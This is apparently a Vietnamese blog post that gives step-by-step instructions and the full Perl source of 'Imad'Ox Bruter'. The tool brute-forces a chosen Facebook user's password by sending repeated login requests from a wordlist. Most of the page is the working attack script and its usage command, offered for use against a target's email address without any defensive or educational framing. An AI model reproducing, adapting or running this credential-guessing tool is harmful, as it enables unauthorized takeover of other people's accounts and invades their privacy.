Bruter Facebook password cracking tool

# Imad’Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS.

Code được viết ngôn ngữ Perl dùng để crack password Facebook theo từ điển password có sẵn. Sử dụng lệnh dưới đây để crack

Các bài viết liên quan

Nên chọn KeePass, LastPass hay 1Password để quản lý Password

13/04/2021

Sự thật về 533 triệu dữ liệu Facebook bị rò rĩ – Cách kiểm tra tài khoản có trong danh sách không

07/04/2021

Cách tạo USB Reset Password Windows 10

30/03/2021

Các cách Hacker dùng để Hack Facebook của bạn và cách khắc phục

23/03/2021

Chuẩn bị

1. Cài active perl trên windows, hoặc sử dụng Koding (http://koding.com)
2. Save code với tên file Bruter.pl
3. Tải worldlist về (file chứa các mật khẩu thường) lưu về thành password.txt  >>Download<<
4. Sử dụng lệnh dưới đây để crack

perl Bruter.pl [email protected] password.txt

Trong đó:

[email protected]: là email facebook muốn crack

password.txt: là file chứa từ điển password (có thể download trên mạng rất nhiều). Từ khóa: worldlist password txt.

Code:

#!/usr/bin/perl
#
# Tool: Imad'Ox Bruter
# Author: Imad'Ox Hunter
# Contact: [email protected]
# Code date: 17 April 2013
# 
#
# Description:
# Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS.
#
# Usage:
# perl Imad'Ox-Bruter.pl login wordlist
# login could be either a user's email address or profile name
#
# Module Requirements:
#
# Install module if missing:
# perl -MCPAN -e 'install Net::SSLeay'
#
# Demo:
# perl Imad'Ox-Bruter.pl [email protected] wordlist.lst 
#
# --- Imad'Ox-Bruter Facebook password cracking tool
# --- By Imad'Ox Hunter
# --- www.facebook.com/imad.elouajib
#
# [+] Cracking [email protected] ...
#
# [-] test -> Failed
# [-] test123 -> Failed
# [-] testtest -> Failed
# [-] testest123 -> Failed
# [-] qwerty -> Failed
# [-] azerty -> Failed
# [-] password -> Failed
# [-] password123 -> Failed
#
########################################################
# [+] CRACKED! Your password is [email protected]$$W0RD
########################################################
#

use strict;
use Net::SSLeay::Handle;

if(!defined($ARGV[0] && $ARGV[1])) {

system('clear');
print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
print "+++ Coded by Imad'Ox-Hunter\n";
print "+++ www.fb.com/imad.elouajib\n\n";
print "+++ Usage: perl $0 login wordlist\n\n";
exit; }

my $user = $ARGV[0];
my $wordlist = $ARGV[1];

open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n";

print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
print "+++ Coded by Imad'Ox-Hunter\n";
print "+++ www.fb.com/imad.elouajib\n";
print "\n[+] Now Cracking $user ...\n\n";

while (my $password = <LIST>) {
chomp ($password);
$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;

my $a = "POST /login.php HTTP/1.1";
my $b = "Host: www.facebook.com";
my $c = "Connection: close";
my $e = "Cache-Control: max-age=0";
my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
my $g = "Origin: https://www.facebook.com";
my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
my $i = "Content-Type: application/x-www-form-urlencoded";
my $j = "Accept-Encoding: gzip,deflate,sdch";
my $k = "Accept-Language: en-US,en;q=0.8";
my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";

my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
my $cl = length($post);
my $d = "Content-Length: $cl";


my ($host, $port) = ("www.facebook.com", 443);

tie(*SSL, "Net::SSLeay::Handle", $host, $port);
  

print SSL "$a\n";
print SSL "$b\n";
print SSL "$c\n";
print SSL "$d\n";
print SSL "$e\n";
print SSL "$f\n";
print SSL "$g\n";
print SSL "$h\n";
print SSL "$i\n";
print SSL "$j\n";
print SSL "$k\n";
print SSL "$l\n";
print SSL "$cookie\n\n";

print SSL "$post\n";

my $success;
while(my $result = <SSL>){
if($result =~ /Location(.*?)/){
$success = $1;
}
}
if (!defined $success)
{
print "[-] $password -> Not Him :( \n";
close SSL;
}
else
{
print "\n########################################################\n";
print "[+] Yuuup!! Pass Cracked => Pass is $password :D\n";
print "########################################################\n\n";
close SSL;
exit;
}
}